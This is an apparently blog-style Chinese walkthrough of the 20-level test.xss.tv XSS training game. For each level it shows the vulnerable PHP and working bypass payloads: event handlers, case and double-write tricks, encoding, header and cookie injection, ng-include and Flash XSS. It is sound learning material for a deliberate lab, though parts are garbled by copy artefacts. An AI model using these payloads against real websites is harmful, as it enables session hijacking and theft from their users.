最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss.tv/
实验环境也可以本地搭建,不过需要php+mysql的环境:
xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8
我这里使用本地搭建,方便分析代码,安装好的页面如下:
level1
登录页面:
查看代码
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
通过分析代码发现$str从url接受一个get类型的name参数,并且没有对传入的name参数进行任何过滤
直接echo出来,我们可以直接构造任意可弹窗payload,
这里使用最基本的:,也可以使用 <svg/οnlοad=alert(1)> 等…
闯关成功!
level2(黑名单绕过)
查看源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
分析代码,仍然是使用get方法,从url中接受一个keyword参数,不过这里用到一个过滤函数htmlspecialchars(),这个函数把预定义的字符转换为 HTML 实体,等于<不能用,这时候一种方法是黑名单绕过,就是不使用被过滤的符号,使用js的事件:
payload :
" οnclick=alert(1)>这样需要点击一下输入框<br>
" onmouseover=alert(1)>需要鼠标划过输入框<br>
另外一种方法就是在构造payload就要将input的文本框本分提前闭合,不影响我们弹框代码,
我这里使用
"><script>alert(1)</script>
这样的话 :
<input name="keyword" value=" "><script>alert(1)</script>"
这样value=" ",不会检查我们的弹窗代码
闯关成功!
level3(‘绕过)
分析关键代码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
这一关,过滤规则的更严格了,经过测试,“>”,“<”,“"”,被过滤了,但是单引号“’”,没有过滤,所以此处尝试js语句,' onmouseover=alert(3)//
测试,后面无法闭合,所以使用了注释“//”。
闯关成功!
level 4(文本框标签绕过)
查看其关键代码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
分析代码,str_replace(">","",$str),此函数是将变量str中的字符>转换为空,转换时区分大小写;同样也把<转换为空,然后再经过函数的过滤转化,这时要在没有符号“<>”,的情况下构造语句,并且不被htmlspecialchars()函数影响。所以这里可以构造一个输入到文本框后出现相应的事件。
" οnfοcus=alert(1) autofocus="
" onclick=alert(1) //
这样我们输入的payload没有被函数过滤,并且经过htmlspecailchars()函数转换并不影响最 input文本框。所以输入后文本框内容就变成了:
<input name=keyword value=" " onclick=alert(1) //">
Onfocus事件:定义的事件将在对象获得焦点时触发,这里指input标签获得焦点。
Autofocus属性:input标签的属性,当页面加载input标签,自动获得焦点。
焦点:这里指你的光标的位置,也就是说当你的光标出现在input文本框这里,将进行onfocus事件的发生。
level5(过滤鼠标事件onclick,Script标签)
查看源码:
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
分析代码发现,$str2=str_replace("<script","<scr_ipt",$str);
s
t
r
3
=
s
t
r
r
e
p
l
a
c
e
(
"
o
n
"
,
"
o
n
"
,
str3=str_replace("on","o_n",
str3=strreplace("on","on",str2); 就直接把<script 转换成 <scr_ipt ,on转换成 o_n ,这样就过滤了js事件,
s
t
r
=
s
t
r
t
o
l
o
w
e
r
(
str = strtolower(
str=strtolower(_GET[“keyword”]);这样
大小写绕过也失效,不过这次没有过滤尖括号<>,这里使用伪协议来构造payload:
"><iframe src=javascript:alert(1)>
"> <a href="javascript:alert(1)">level6</a>
"> <a href="javascript:%61lert(1)">level6</a>
这样的话:
<input name=keyword value=" "><iframe src=javascript:alert(1)>">
这样就变成了
<input name=keyword value=""><iframe src=javascript:alert(1)>">
闯关成功!
level6(大小写绕过)
查看源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
分析代码,发现同样过滤了很多字符,<script 转换成 <scr_ipt ,on 转换成 o_n ,src 转换成 sr_c ,
data 转换成 da_ta,href 转换成 hr_ef,比起上一关,发现这里没有大小写约束, 我们可以构造payload:
"> <Script>alert(1)</script>
"> <img Src=x OnError=alert(1)>
"><a HrEf="javascript:alert(1)">level7</a>
"><svg x=" " Onclick=alert(1)>
"><ScriPt>alert(1)<sCrIpt>"
" OncliCk=alert(1)
闯关成功!
level7(双写绕过)
查看源码:
<?php
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
分析代码,不仅大小写不能用了,script,on,src ,data ,href 都直接转换成空,尝试双写绕过,构造payload:
">alert(1)
" oonnmouseover=alert(1) >
">level8
level 8(编码绕过)
查看源码:
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
分析代码,<script 转换成 <scr_ipt ,on 转换成 o_n ,src 转换成 sr_c ,data 转换成 da_ta,href 转换成 hr_ef,
大小写也失效了," 还被编码,但是尖括号<> ,单引号 ’ ,% ,# ,& 符号没有被过滤,输出点在a标签内,href属性中,属性中双引号被转换成HTML实体,无法截断属性,我们可以使用协议绕过javascript:alert,由于script关键字被过滤,javascript会被替换成javasc_rpt,我们使用r来代替r ,HTML字符实体转换:https://www.qqxiuzi.cn/bianma/zifushiti.php
,伪协议后面可以使用URL编码等进行编码。构造payload:
javascript:alert(1)
javascript:alert`1`
javascript:alert`1`
level 9(检测http)
查看源码:
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
分析代码,发现跟上个挑战大同小异,不同的是多了自己自动检测url,如果发现没有带http:// 内容则会显示不合法,
构造payload:
javascript:alert(1)//http://xxx.com //利用注释
javascript:%0dhttp://xxx.com%0dalert(1) //不利用注释
javascript:%0ahttp://xxx.com%0dalert(1) //不利用注释
level 10(修改隐藏标签)
查看源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
分析代码,发现需要两个参数,一个是keyword,一个是t_sort,尖括号<>都被转换成空,还有三个hidden的隐藏输入框,
或许我们可以从隐藏的输入框下手,构造payload:
keyword = test&t_sort="type="text" onclick = "alert(1)
keyword = test&t_sort="type="text" οnmοuseοver="alert(1)
keyword = test&t_sort="type="text" onmouseover=alert`1`
level11(http头部注入)
查看源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
分析代码,发现比起上一个挑战来说,多了一个 str11=_SERVER[‘HTTP_REFERER’]; 考察的是http头部的xss注入,开始抓包,fiddler修改相应的字段,构造http头部Referer的payload:
level12(user-agent注入)
查看源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
分析代码,这次换成了 \str11=_SERVER[‘HTTP_USER_AGENT’]; 应该是User-Agent的http头部注入,fiddler抓包,构造http头部User-Agent的payload:
User-Agent: " οnmοuseοver=alert(1) type="text"
User-Agent: " onclick="alert(1) type="text"
level13(cookie注入)
查看源码:
<?php
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
分析代码,这次换成了 setcookie(“user”, “call me maybe?”, time()+3600); 应该是cookie类型的xss注入
直接构造payload:
Cookie: user=" οnmοuseοver=alert(1) type="text"
Cookie: user=" onclick="alert(1) type="text"
level14(乌云漏洞)
查看源码:
<body>
<h1 align=center>欢迎来到level14</h1>
<center><iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe></center><center>这关成功后不会自动跳转。成功者<a href=/xsschallenge/level15.php?src=1.gif>点我进level15</a></center>
</body>
…level14崩了,我们看一下大佬的payload:
"><img src=1 onerror=alert(1)>
百度得出答案,这里用的是乌云爆出的exif viewer的漏洞,漏洞原理是通过修改图片的exif信息,造成解析图片exif触发XSS。利用工具推荐exiftool。以后看见上传果断又一个姿势啊。修改图片exif信息如标题,作者。
level15(ng-include文件包含)
查看源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>
分析代码,这一关考的angular js的知识,稍微百度一下相关知识,发现ng-include有包含文件的意思,也就相当于php里面的include
发现可以包含第一关的页面,构造payload:
src='level1.php?name=<img src=x οnerrοr=alert(1)>'
level16(%0a、%0d绕过)
查看源码:
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace(" "," ",$str4);
echo "<center>".$str5."</center>";
?>
分析代码,发现大小写绕过失效,script , / , ,等都被转换成 ,我们可以用%0d,%0a等绕过:
构造payload:
<img%0Dsrc=x%0Donerror=alert(1)>
<iframe%0asrc=x%0donmouseover=alert`1`></iframe>
<svg%0aonload=alert`1`></svg>
level17(on事件绕过)
查看源码:
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
刚开始以为是Flash XSS,仔细一看发现不是,使用了htmlspecialchars进行实体编码,和第三关就一样了,使用on事件。
构造payload:
arg01=123&arg02= onmouseover=alert(1)
arg01=123&arg02=%20onmousedown=alert`1`
arg01=123&arg02= onmouseover=alert(1) type="text"
level18(on事件绕过)
查看源码:
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
分析代码,发现完全可以用上一挑战的方法,payload
arg01=123&arg02= onmouseover=alert(1)
arg01=123&arg02=%20onmousedown=alert`1`
arg01=123&arg02= onmouseover=alert(1) type="text"
level19
查看源码:
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
查看前端代码,发现访问swf的时候在传参
接下来直接访问这个链接。
这里可以看到flash里面提示sifr.js是没有定义的,这不仅仅是个图片。。。
需要对flash进行反编译查看源码,使用的是jpexs
通过sifr找到了对应的脚本位置,比较长,就一点点说明过程了。
在此脚本中找到了flash显示的信息,关键在%s这里。
接着去定位%s,
里先把VERSION.WARNING以%s打散成数组,然后再以version的方式组合成字符串。搜索了一圈,并没有version,对flash太不熟悉了,只通过p-code发现了这样的一个东西。
感觉是通过url里面获取变量的,于是构造了一个尝试arg01=version&arg02=123,原因是php里面是这样传参的,必须是两个值。
结果和预期一样,123出现了。
尝试了大量xss语句发现,只有这种可以,如果是img或者svg后面都会不完整,所以就构造了语句
arg01=version&arg02=<a href="javascript:alert(/xss/)">xss</a>
点击XSS成功进入下一关。
level20
分析源码:
<?php
ini_set("display_errors", 0);
echo '<embed src="xsf04.swf?'.htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"]).'" width=100% heigth=100%>';
?>
后台源码与十九关一样,这一题也是flash xss,参考大佬博客,本题也属于Flash XSS,将xsf04.swf文件分析得知分析得知是zeroclipboard.swf
arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)//%26width%26height
闯关成功!